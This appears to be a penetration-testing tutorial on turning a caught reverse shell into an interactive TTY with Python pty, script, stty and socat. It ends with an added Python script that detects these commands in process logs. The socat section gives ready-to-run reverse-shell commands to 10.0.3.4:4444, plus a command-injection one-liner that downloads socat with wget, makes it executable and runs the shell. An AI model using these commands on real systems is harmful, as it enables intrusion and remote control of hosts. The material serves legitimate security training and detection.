Upgrading Simple Shells to Fully Interactive TTYs

Method 1: Python pty module

One of my go-to commands for a long time after catching a dumb shell was to use Python to spawn a pty. The pty module lets you spawn a pseudo-terminal that can fool commands like su into thinking they are being executed in a proper terminal. Spawning /bin/bash through pty.spawn() connects the new shell's standard I/O to that pseudo-terminal. To upgrade a dumb shell, simply run the following command:

python -c 'import pty; pty.spawn("/bin/bash")'

This will let you run su, for example, in addition to giving you a nicer prompt.

Method 2: Shell to Bash

Upgrade from a plain sh shell to bash. The script utility runs the shell inside a pseudo-terminal; -q suppresses its start and stop messages, and /dev/null discards the typescript file it would otherwise write:

SHELL=/bin/bash script -q /dev/null

Method 3: Fully Interactive TTY

Background the current remote shell (Ctrl-Z), switch the local terminal to raw mode with echo disabled using stty, and bring the remote shell back to the foreground. In raw mode keystrokes such as Ctrl-C are passed through to the remote shell instead of being handled locally:

stty raw -echo && fg

After bringing the job back, output will be misaligned and the cursor pushed to the left. Reinitialize the terminal with reset.

Method 4: Using socat

socat is like netcat on steroids and is a very powerful networking Swiss Army knife. socat can be used to pass full TTYs over TCP connections.

If socat is installed on the victim server, you can launch a reverse shell with it. You must catch the connection with socat as well to get the full functionality.

The following commands will yield a fully interactive TTY reverse shell:

On Kali (listen):

socat file:`tty`,raw,echo=0 tcp-listen:4444

On Victim (launch):

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

If socat isn't installed, you're not out of luck. There are standalone binaries that can be downloaded from this awesome GitHub repo:

https://github.com/andrew-d/static-binaries

With a command injection vulnerability, it's possible to download the socat binary for the correct architecture to a writable directory, chmod it, then execute a reverse shell in one line:

wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

On Kali, you'll catch a fully interactive TTY session. It supports tab completion, SIGINT/SIGTSTP handling, vim, up-arrow history, etc. It's a full terminal. Pretty sweet.
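From the defender's side, every upgrade command above leaves a recognisable command line in process execution telemetry. As an added example that is not part of the original post, here is a small Python checker that flags the exact forms shown here (pty.spawn, script with /dev/null, socat with a pty) in process-log lines; the log format and the sample lines are constructed for this example and are assumptions, not real captures.

```python
import re

# Indicators derived from the upgrade commands discussed in this post. The
# process-log format and the sample lines below are constructed for this example.
TTY_UPGRADE_PATTERNS = {
    # python -c 'import pty; pty.spawn("/bin/bash")'
    "python-pty-spawn": re.compile(r"\bpty\.spawn\s*\("),
    # SHELL=/bin/bash script -q /dev/null
    "script-dev-null": re.compile(r"\bscript\b.*\s/dev/null\b"),
    # socat exec:'bash -li',pty,... tcp:<host>:<port>
    "socat-pty-shell": re.compile(r"\bsocat\b.*\bexec:.*\bpty\b"),
}

# Assumed line shape: 'pid=<n> user=<name> cmd=<command line>'
LOG_LINE = re.compile(r"pid=(\d+)\s+user=(\S+)\s+cmd=(.*)")


def classify_cmdline(cmdline):
    """Return the indicator names matched by one command line (empty if none)."""
    return [name for name, rx in TTY_UPGRADE_PATTERNS.items() if rx.search(cmdline)]


def scan_process_log(lines):
    """Return (pid, user, indicators) for every log line whose command matches."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if not m:
            continue  # skip lines that do not follow the assumed format
        pid, user, cmd = m.groups()
        tags = classify_cmdline(cmd)
        if tags:
            hits.append((int(pid), user, tags))
    return hits


# Constructed sample: three upgrade attempts by a web-server account plus two
# benign lines that use the same tools in ordinary ways.
SAMPLE_LOG = [
    "pid=1201 user=www-data cmd=python -c 'import pty; pty.spawn(\"/bin/bash\")'",
    "pid=1202 user=www-data cmd=script -q /dev/null",
    "pid=1203 user=www-data cmd=/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444",
    "pid=1204 user=alice cmd=python -c 'import json; print(json.dumps({}))'",
    "pid=1205 user=root cmd=script -q session.log",
]

if __name__ == "__main__":
    for pid, user, tags in scan_process_log(SAMPLE_LOG):
        print(f"pid={pid} user={user} indicators={','.join(tags)}")
```

These are literal matches on the forms shown in this post; adapt the patterns to the process telemetry you actually collect, since trivially reworded command lines will not match.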
